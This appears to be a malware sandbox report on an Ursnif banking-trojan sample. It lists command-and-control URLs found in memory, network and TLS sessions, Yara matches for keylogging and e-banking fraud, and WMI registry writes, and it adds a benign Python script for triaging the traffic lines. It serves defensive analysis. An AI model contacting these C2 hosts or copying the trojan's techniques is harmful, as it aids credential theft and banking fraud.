Source: powershell.exe, 0000002F.00000002.937086624.00000251ABC51000.00000004.00000001.sdmp, powershell.exe, 00000034.00000002.933509067.0000015F80001000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: control.exe, 00000032.00000000.914635032.00000200948F0000.00000002.00000001.sdmp String found in binary or memory: http://taybhctdyehfhgthp2.xyz/jdraw/RLbbZoqov27/RZXl47dw7WS2hD/qIyj2qjQipAh2ErH6xoal/uDkYECdj5j
Source: loaddll32.exe, 00000000.00000002.936200566.0000000002250000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.937464403.0000000003A40000.00000002.00000001.sdmp, powershell.exe, 0000002F.00000002.936379966.00000251AA760000.00000002.00000001.sdmp, control.exe, 00000032.00000000.914635032.00000200948F0000.00000002.00000001.sdmp String found in binary or memory: http://taybhctdyehfhgthp2.xyz/jdraw/TMw5yrrD58_2F_2BhR/g9tx6WwiG/Y4ETyUqNXMfs0pkiHuVm/dVQuHu9BK
Source: loaddll32.exe, 00000000.00000002.936200566.0000000002250000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.937464403.0000000003A40000.00000002.00000001.sdmp, powershell.exe, 0000002F.00000002.936379966.00000251AA760000.00000002.00000001.sdmp, control.exe, 00000032.00000000.914635032.00000200948F0000.00000002.00000001.sdmp String found in binary or memory: http://taybhctdyehfhgthp2.xyz/jdraw/YfhAKSrZ_/2B_2FjO_2BEfGkA859_2/BmcHGy0Exj8cPI6312d/hMFhmCvK
Source: loaddll32.exe, 00000000.00000002.936200566.0000000002250000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.937464403.0000000003A40000.00000002.00000001.sdmp, powershell.exe, 0000002F.00000002.936379966.00000251AA760000.00000002.00000001.sdmp, control.exe, 00000032.00000000.917390433.00000200948F0000.00000002.00000001.sdmp String found in binary or memory: http://taybhctdyehfhgthp2.xyz/jdraw/pBKH4QNe_/2BwOCg1mW3gHfkXlroYv/qwMSGdzvy41rio90Pee/xoNO_2FG
Source: loaddll32.exe, 00000000.00000002.936200566.0000000002250000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.937464403.0000000003A40000.00000002.00000001.sdmp, powershell.exe, 0000002F.00000002.936379966.00000251AA760000.00000002.00000001.sdmp, control.exe, 00000032.00000000.914635032.00000200948F0000.00000002.00000001.sdmp String found in binary or memory: http://taybhctdyehfhgthp2.xyz/jdraw/zTjbj3kKOaJ_2FHCn/EBB0ghxmT2zf/tZbW0q1dqvV/yVEV1RDmPsuUHe/9
Source: powershell.exe, 0000002F.00000002.938114563.00000251ABE5F000.00000004.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 0000002F.00000002.963318861.00000251BBCC1000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000002F.00000002.963318861.00000251BBCC1000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000002F.00000002.963318861.00000251BBCC1000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000002F.00000002.938114563.00000251ABE5F000.00000004.00000001.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 0000002F.00000002.963318861.00000251BBCC1000.00000004.00000001.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: rundll32.exe, 00000007.00000003.795720865.000000000584A000.00000004.00000040.sdmp String found in binary or memory: https://s.uicdn.com/mailint/9.1722.0/
Source: rundll32.exe, 00000007.00000003.795720865.000000000584A000.00000004.00000040.sdmp String found in binary or memory: https://s.uicdn.com/mailint/9.1722.0/assets/potec.core.min.js
Source: rundll32.exe, 00000007.00000003.795720865.000000000584A000.00000004.00000040.sdmp String found in binary or memory: https://wa.ui-portal.de/opt-out-transfer/mailcom/
Source: rundll32.exe, 00000007.00000003.846631247.00000000034EC000.00000004.00000001.sdmp String found in binary or memory: https://www.googletagmanager.com/gtm.js?id=
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49865
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49864
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49863
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49862
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49861
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49860
Source: unknown Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49875 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49852 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49826 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49859
Source: unknown Network traffic detected: HTTP traffic on port 49849 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49858
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49852
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49851
Source: unknown Network traffic detected: HTTP traffic on port 49837 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49850
Source: unknown Network traffic detected: HTTP traffic on port 49858 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49872 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49798 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49849
Source: unknown Network traffic detected: HTTP traffic on port 49861 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49846
Source: unknown Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49845
Source: unknown Network traffic detected: HTTP traffic on port 49834 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49873 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49793 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49850 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49831 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49839
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49838
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49837
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49836
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49835
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49834
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49833
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49799
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49832
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49798
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49831
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49830
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49796
Source: unknown Network traffic detected: HTTP traffic on port 49839 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49864 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown Network traffic detected: HTTP traffic on port 49822 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown Network traffic detected: HTTP traffic on port 49870 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49796 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49811 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49827
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49826
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49789
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49822
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49821
Source: unknown Network traffic detected: HTTP traffic on port 49865 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown Network traffic detected: HTTP traffic on port 49859 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49836 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49871 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49833 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49799 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49810 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49845 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49791 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49811
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49810
Source: unknown Network traffic detected: HTTP traffic on port 49862 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49794 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49827 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49876 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49851 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49809
Source: unknown Network traffic detected: HTTP traffic on port 49830 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown Network traffic detected: HTTP traffic on port 49783 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown Network traffic detected: HTTP traffic on port 49838 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49863 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown Network traffic detected: HTTP traffic on port 49821 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49877 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49797 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49809 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49860 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49877
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49876
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49875
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49874
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49873
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49872
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49871
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49870
Source: unknown Network traffic detected: HTTP traffic on port 49835 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49874 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49832 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49846 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown Network traffic detected: HTTP traffic on port 49792 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown HTTPS traffic detected: 104.20.185.68:443 -> 192.168.2.4:49745 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.20.185.68:443 -> 192.168.2.4:49746 version: TLS 1.2
Source: unknown HTTPS traffic detected: 87.248.118.22:443 -> 192.168.2.4:49762 version: TLS 1.2
Source: unknown HTTPS traffic detected: 87.248.118.22:443 -> 192.168.2.4:49761 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49763 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49764 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49765 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49766 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49768 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49767 version: TLS 1.2
Source: unknown HTTPS traffic detected: 82.165.229.87:443 -> 192.168.2.4:49809 version: TLS 1.2
Source: unknown HTTPS traffic detected: 82.165.229.59:443 -> 192.168.2.4:49810 version: TLS 1.2
Source: unknown HTTPS traffic detected: 82.165.229.59:443 -> 192.168.2.4:49811 version: TLS 1.2
Source: unknown HTTPS traffic detected: 82.165.229.16:443 -> 192.168.2.4:49821 version: TLS 1.2
Source: unknown HTTPS traffic detected: 82.165.229.16:443 -> 192.168.2.4:49822 version: TLS 1.2
Source: unknown HTTPS traffic detected: 195.20.250.115:443 -> 192.168.2.4:49826 version: TLS 1.2
Source: unknown HTTPS traffic detected: 195.20.250.115:443 -> 192.168.2.4:49827 version: TLS 1.2
Source: unknown HTTPS traffic detected: 82.165.229.87:443 -> 192.168.2.4:49837 version: TLS 1.2
Source: unknown HTTPS traffic detected: 82.165.229.87:443 -> 192.168.2.4:49836 version: TLS 1.2
Source: unknown HTTPS traffic detected: 82.165.229.59:443 -> 192.168.2.4:49839 version: TLS 1.2
Source: unknown HTTPS traffic detected: 82.165.229.59:443 -> 192.168.2.4:49838 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.180.206:443 -> 192.168.2.4:49845 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.180.206:443 -> 192.168.2.4:49846 version: TLS 1.2
Source: unknown HTTPS traffic detected: 82.165.229.54:443 -> 192.168.2.4:49849 version: TLS 1.2
Source: unknown HTTPS traffic detected: 82.165.229.54:443 -> 192.168.2.4:49850 version: TLS 1.2
Source: unknown HTTPS traffic detected: 82.165.229.16:443 -> 192.168.2.4:49851 version: TLS 1.2
Source: unknown HTTPS traffic detected: 82.165.229.16:443 -> 192.168.2.4:49852 version: TLS 1.2
Source: unknown HTTPS traffic detected: 82.165.229.87:443 -> 192.168.2.4:49858 version: TLS 1.2
Source: unknown HTTPS traffic detected: 82.165.229.87:443 -> 192.168.2.4:49859 version: TLS 1.2
Source: unknown HTTPS traffic detected: 82.165.229.59:443 -> 192.168.2.4:49860 version: TLS 1.2
Source: unknown HTTPS traffic detected: 82.165.229.59:443 -> 192.168.2.4:49861 version: TLS 1.2
Source: unknown HTTPS traffic detected: 82.165.229.16:443 -> 192.168.2.4:49863 version: TLS 1.2
Source: unknown HTTPS traffic detected: 82.165.229.16:443 -> 192.168.2.4:49862 version: TLS 1.2
Source: unknown HTTPS traffic detected: 82.165.229.54:443 -> 192.168.2.4:49864 version: TLS 1.2
Source: unknown HTTPS traffic detected: 82.165.229.54:443 -> 192.168.2.4:49865 version: TLS 1.2
Source: unknown HTTPS traffic detected: 82.165.229.87:443 -> 192.168.2.4:49870 version: TLS 1.2
Source: unknown HTTPS traffic detected: 82.165.229.87:443 -> 192.168.2.4:49871 version: TLS 1.2
Source: unknown HTTPS traffic detected: 82.165.229.59:443 -> 192.168.2.4:49872 version: TLS 1.2
Source: unknown HTTPS traffic detected: 82.165.229.59:443 -> 192.168.2.4:49873 version: TLS 1.2
Source: unknown HTTPS traffic detected: 82.165.229.54:443 -> 192.168.2.4:49874 version: TLS 1.2
Source: unknown HTTPS traffic detected: 82.165.229.54:443 -> 192.168.2.4:49875 version: TLS 1.2
Source: unknown HTTPS traffic detected: 82.165.229.16:443 -> 192.168.2.4:49876 version: TLS 1.2
Source: unknown HTTPS traffic detected: 82.165.229.16:443 -> 192.168.2.4:49877 version: TLS 1.2
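
The two lists above describe the same connections twice: the "HTTP traffic on port" lines record every TCP exchange with port 443 (in both directions, so the non-443 side is the sandbox VM's ephemeral port), while the "HTTPS traffic detected" lines record only those sessions whose TLS handshake the sandbox parsed, and are the only place a server IP and TLS version are attributed. The following Python is an added triage helper, not part of the Joe Sandbox report: it pairs the two formats, ranks server IPs by distinct TLS sessions, lists the 443 connections that never received a TLS line, and counts TLS lines repeated verbatim (the excerpt includes one such repeat). REPORT_EXCERPT is a constructed subset of the lines above; feeding the script the full report text is the assumed real use.

```python
import re
from collections import defaultdict

# Constructed excerpt: a handful of the report's own network lines, copied
# verbatim so the script runs offline. Point parse_report() at the full
# report text to analyse every connection.
REPORT_EXCERPT = """
Source: unknown Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49783 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown Network traffic detected: HTTP traffic on port 49809 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49809
Source: unknown Network traffic detected: HTTP traffic on port 49873 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49873
Source: unknown HTTPS traffic detected: 104.20.185.68:443 -> 192.168.2.4:49745 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.20.185.68:443 -> 192.168.2.4:49746 version: TLS 1.2
Source: unknown HTTPS traffic detected: 82.165.229.87:443 -> 192.168.2.4:49809 version: TLS 1.2
Source: unknown HTTPS traffic detected: 82.165.229.59:443 -> 192.168.2.4:49873 version: TLS 1.2
Source: unknown HTTPS traffic detected: 82.165.229.59:443 -> 192.168.2.4:49873 version: TLS 1.2
"""

HTTP_RE = re.compile(r"HTTP traffic on port (\d+) -> (\d+)")
TLS_RE = re.compile(
    r"HTTPS traffic detected: (\d+\.\d+\.\d+\.\d+):(\d+) -> "
    r"(\d+\.\d+\.\d+\.\d+):(\d+) version: (TLS [\d.]+)"
)


def parse_report(text):
    """Return (client_ports, tls_sessions, duplicate_tls_lines).

    client_ports        : every sandbox-side ephemeral port seen talking to tcp/443
    tls_sessions        : server IP -> set of client ports with a parsed TLS handshake
    duplicate_tls_lines : TLS lines repeated verbatim (a report artefact, not a session)
    """
    client_ports = set()
    tls_sessions = defaultdict(set)
    seen_tls = set()
    duplicates = 0
    for line in text.splitlines():
        m = HTTP_RE.search(line)
        if m:
            a, b = int(m.group(1)), int(m.group(2))
            # The report lists both directions; the non-443 side is the VM's port.
            if 443 in (a, b):
                client_ports.add(b if a == 443 else a)
            continue
        m = TLS_RE.search(line)
        if m:
            server_ip, client_port, version = m.group(1), int(m.group(4)), m.group(5)
            key = (server_ip, client_port, version)
            if key in seen_tls:
                duplicates += 1
            seen_tls.add(key)
            tls_sessions[server_ip].add(client_port)
    return client_ports, dict(tls_sessions), duplicates


def sessions_per_server(tls_sessions):
    """Distinct TLS sessions per server IP: a quick C2-versus-noise ranking."""
    return {ip: len(ports) for ip, ports in tls_sessions.items()}


def ports_without_tls(client_ports, tls_sessions):
    """Connections to 443 for which the report recorded no TLS handshake."""
    with_tls = set()
    for ports in tls_sessions.values():
        with_tls |= ports
    return sorted(client_ports - with_tls)


if __name__ == "__main__":
    ports, tls, dups = parse_report(REPORT_EXCERPT)
    for ip, n in sorted(sessions_per_server(tls).items(), key=lambda kv: -kv[1]):
        print(f"{ip:16} {n} TLS session(s)")
    print("443 connections without a TLS line:", ports_without_tls(ports, tls))
    print("duplicate TLS lines:", dups)
```

Run against the full list above, the "without a TLS line" set is not empty: ports such as 49735, 49747, 49783 to 49799 and 49830 to 49835 appear on 443 but have no "HTTPS traffic detected" line, so the report attributes no server IP or TLS version to them and only the pcap can say what they were. The per-server counts also separate the 82.165.229.x hosts, which each carry several sessions, from the two-session CDN and Google addresses.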

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif
Source: Yara match File source: 00000000.00000003.718768044.0000000001EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.792588340.0000000005208000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.910870766.000000000500C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.743986098.0000000005848000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.754576282.0000000005068000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.886665865.0000000004318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.743884780.0000000005848000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.718843741.0000000001EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000032.00000003.921590323.000002009624C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.754698141.0000000005068000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.942431868.0000000006548000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.754769459.0000000005068000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000032.00000003.921653707.000002009624C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.866559376.0000000004E6C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.918784964.0000000006548000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.887362979.0000000004318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.754654918.0000000005068000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.743778425.0000000005848000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.792300169.0000000005208000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.743828986.0000000005848000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.792520115.0000000005208000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.718744882.0000000001EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.792349818.0000000005208000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000032.00000003.921759909.000002009624C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.926000939.0000000005D38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.744005054.0000000005848000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.886778931.0000000004318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.718819209.0000000001EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.743935552.0000000005848000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.792420602.0000000005208000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.792562195.0000000005208000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.754876807.0000000005068000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.887204962.0000000004318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.718696614.0000000001EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.886970529.0000000004318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.718647612.0000000001EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.754836366.0000000005068000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.858457272.000000000564C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000032.00000003.921808684.000002009624C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.824971303.0000000001CAC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.744015390.0000000005848000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.743688599.0000000005848000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.718721890.0000000001EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.887090567.0000000004318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.887042071.0000000004318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.718792278.0000000001EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.754897105.0000000005068000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.887180889.0000000004318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.887136487.0000000004318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.792489565.0000000005208000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.792387675.0000000005208000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.754923089.0000000005068000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.940528675.0000000005D38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 6632, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 6560, type: MEMORY

E-Banking Fraud:

Yara detected Ursnif
Source: Yara match File source: the same 55 memory dumps and process memory spaces (rundll32.exe PID 6632, loaddll32.exe PID 6560) listed under Key, Mouse, Clipboard, Microphone and Screen Capturing above

System Summary:

Writes or reads registry keys via WMI
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
